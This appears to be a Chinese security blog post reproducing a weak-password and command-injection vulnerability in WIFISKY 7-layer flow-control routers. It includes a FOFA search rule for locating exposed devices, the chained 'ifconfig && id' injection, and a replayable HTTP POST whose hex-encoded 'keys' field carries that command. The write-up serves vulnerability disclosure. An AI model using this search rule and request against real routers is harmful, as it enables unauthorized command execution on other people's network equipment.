编者注
广诚市保卫者
漏洞暂时没有漏洞编号,
01
漏洞描述
深圳市领空技术有限公司(简称“领空技术”)是扎根深圳辐射全球的网络通讯设备供应商,研发范围涵盖:AC、AP、路由、网桥、中继、网卡等网络通讯产品。
攻击路径 |
远程 |
攻击复杂度 |
低 |
权限要求 |
高权限 |
用户交互 |
不需要 |
02
搜索规则
fofa |
title=="WIFISKY 7层流控路由器" |
03
靶标环境
04
漏洞复现
访问页面如下:
输入账号密码会自动提醒默认密码需要修改:
在系统维护->命令控制台中进行执行命令,输入系统自带 ifconfig + "&& id" 就可以获取系统权限情况。
由于ifconfig内容过多,所以拉到最下面可以看到id命令执行成功。
本身使用的js来进行动态请求,导致操作较卡。可以直接获取对应的包重放。
POST /console/? HTTP/1.1
Host: {目标ip地址}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: SESSID=xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
width=213&height=22&session={session信息}&keys=6966636F6E6669672026262069640D
05
参考资料
https://quake.360.cn/quake/#/vulDetail/QH-202106-1447/front
广诚市保卫者
在平行世界的另一头“广诚市”上演着一幕幕黑客围城。
长按二维码关注
发现“分享”和“赞”了吗,戳我看看吧
本文始发于微信公众号(广诚市保卫者):WIFISKY 7层流控路由器弱口令&命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论